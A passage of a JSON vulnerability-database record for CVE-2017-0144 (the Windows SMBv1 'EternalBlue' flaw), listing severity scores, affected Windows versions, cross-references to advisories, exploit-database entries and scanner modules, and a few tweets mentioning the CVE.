["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97"], "type": "avleonov"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["SMNTC-96704"], "type": "symantec"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": 
["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:E18080D17705880B2E7B69B8AB125EA9"], "type": "thn"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-09-21T14:31:16", "rev": 2, "value": 8.4, "vector": "NONE"}}, "hash": "df68563c5964afa2fb9d5d8a7085b5d6fee24ee461c4e9cd721b101b51605eab", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "3d33672b05b572e15dc2cac26ad54d7c", "key": "title"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "8378623388dea1b8ea71bec9adacab2c", "key": "references"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "6fd95f86c673c4a8b4f1fd51b22d928f", "key": "href"}, {"hash": 
"0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "e9f80c9b0a5d969452d09ddbf4c74a71", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "013b6203cead14382a8f19ad32d99966", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0144", "id": "CVE-2017-0144", "lastseen": "2020-09-21T14:31:16", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["https://www.exploit-db.com/exploits/42031/", "https://www.exploit-db.com/exploits/42030/", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securityfocus.com/bid/96704", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0144", "type": "cve", "viewCount": 232}, "differentElements": ["affectedConfiguration", "cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T14:31:16"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0144"], "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-10-04T12:18:44", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"], "type": "threatpost"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["SMNTC-96704"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, 
{"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-10-04T12:18:44", "value": 8.4, "vector": "NONE"}}, "hash": "29a618f5b1bff10fc513eac7318e8abfa3d7c51a08502334d5e93ed0625a2de7", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "3d33672b05b572e15dc2cac26ad54d7c", "key": "title"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "c0953a82b0a69f93598bec4d6f0ddcb0", "key": "references"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "6fd95f86c673c4a8b4f1fd51b22d928f", "key": "href"}, {"hash": "e9f80c9b0a5d969452d09ddbf4c74a71", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "013b6203cead14382a8f19ad32d99966", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0144", "id": "CVE-2017-0144", "lastseen": "2019-10-04T12:18:44", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["https://www.exploit-db.com/exploits/42031/", "https://www.exploit-db.com/exploits/42030/", "http://www.securityfocus.com/bid/96704", "http://www.securitytracker.com/id/1037991", 
"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0144", "type": "cve", "viewCount": 139}, "differentElements": ["references"], "edition": 2, "lastseen": "2019-10-04T12:18:44"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "dd4a1fba31e29c6988f563bdeb65c80c"}, {"key": "affectedSoftware", "hash": "e758f8fa39ce9e8de2ffe527ec8b6423"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "a173072793578541ea04b7baa0323592"}, {"key": "cpe23", "hash": "0751f4e56f29adf827144e01a128331d"}, {"key": "cpeConfiguration", "hash": "6ac681e59932d7c840205e984b11bad5"}, {"key": "cvelist", "hash": "013b6203cead14382a8f19ad32d99966"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "cwe", "hash": "226da5129ffaaee3d5b48e506b957d58"}, {"key": "description", "hash": "e9f80c9b0a5d969452d09ddbf4c74a71"}, {"key": "extraReferences", "hash": "fb65e2b51285ba6bbdd4e82c86d7dbc3"}, {"key": "href", "hash": "6fd95f86c673c4a8b4f1fd51b22d928f"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d68798550042e5272198c20ea65d8f01"}, {"key": "published", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, {"key": "references", "hash": "8378623388dea1b8ea71bec9adacab2c"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "3d33672b05b572e15dc2cac26ad54d7c"}, 
{"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "b1d215f72ec6f2e27faa61f328e46a1c2787a5b0c382c01a01ff757d377b37a3", "viewCount": 441, "enchantments": {"dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "symantec", "idList": ["SMNTC-96704"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0198"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "threatpost", "idList": ["THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:42030"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": 
["MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:4A6B394DCAF12E05136AE087248E228C"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "fireeye", "idList": ["FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:399092589F455855881447C60B56C21A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:EA407B51944632C248FEB495594123EA", "THN:E18080D17705880B2E7B69B8AB125EA9"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], 
"modified": "2021-04-23T00:07:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}], "modified": "2021-04-23T00:07:42"}, "score": {"value": 8.4, "vector": "NONE", "modified": "2021-04-23T00:07:42", "rev": 2}, "twitter": {"counter": 16, "tweets": [{"link": "https://twitter.com/AlqarniMazhood/status/1362380423721017347", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660. \n/hashtag/\u0633\u0647_\u0643\u062f\u062f\u062f\u0627?src=hashtag_click"}, {"link": "https://twitter.com/kitty14956590/status/1384943024250228740", "text": "when the CVE-2017-0144 sus"}, {"link": "https://twitter.com/mohannad_1saad1/status/1362746840261816323", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660. \n/hashtag/\u0643\u0627\u0633_\u0627\u0644\u0633\u0639\u0648\u062f\u064a\u0629_\u0627\u0644\u0639\u0627\u0644\u0645\u064a_\u0644\u0644\u062e\u062e\u062e\u062e\u062e\u064a\u0644?src=hashtag_click"}, {"link": "https://twitter.com/AllahibiReem/status/1362691966404861952", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660."}, {"link": "https://twitter.com/omaryazeed665/status/1362621178637135873", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660. \n/hashtag/\u064a\u0648\u0645_\u0627\u0644\u062c\u0645\u0639\u0647?src=hashtag_click"}, {"link": "https://twitter.com/bashayeralsallo/status/1362434722924818437", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660. 
\n/hashtag/\u0633\u0644\u0637\u0627\u0646?src=hashtag_click"}, {"link": "https://twitter.com/kitty14956590/status/1384942932843712514", "text": "when the CVE-2017-0144 sus"}, {"link": "https://twitter.com/Sid____/status/1382708880719933448", "text": "the most damaging one used by Russian govt. (and others) was CVE-2017-0144 commonly known as EternalBlue. We know why it will never make the \"list\"!"}, {"link": "https://twitter.com/Ricardo34834369/status/1404720281789292552", "text": "Wow so the most famous YT-1300 of all times is vulnerable to CVE-2017-0144 /hashtag/vulnerabilities?src=hashtag_click /hashtag/notreal?src=hashtag_click /hashtag/cybersecurity?src=hashtag_click /hashtag/starwars?src=hashtag_click"}, {"link": "https://twitter.com/VulmonFeeds/status/1417191225837379593", "text": "CVE-2017-0144\n\nThe SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; ...\n\nhttps://t.co/foy373dLBH?amp=1"}], "modified": "2021-04-23T00:07:42"}}, "objectVersion": "1.5", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-20"], "scheme": null, "affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": 
"cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "96704", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/96704"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": 
"41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "42031", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/42031/"}, {"name": "42030", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/42030/"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": 